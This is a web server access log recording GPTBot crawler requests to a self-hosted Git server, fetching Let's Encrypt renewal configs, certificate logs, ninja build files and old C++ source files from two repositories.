"/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:15:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:15:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11719] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:15:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:15:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11694] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:15:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:15:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11720] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:15:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:15:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11711] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:15:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:15:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12792] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11419] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" -[17/Feb/2026:15:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11418] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" -[17/Feb/2026:15:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15358] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13526] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11208] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11207] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15359] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10948] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" -[17/Feb/2026:15:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11418] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" -[17/Feb/2026:15:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13525] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12303] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:15:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16098] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:15:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13452] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:15:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16099] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:15:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13454] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:15:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10478] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:15:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:15:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20012] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:15:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10481] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:15:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10478] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11207] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11210] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12793] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:15:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10184] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr 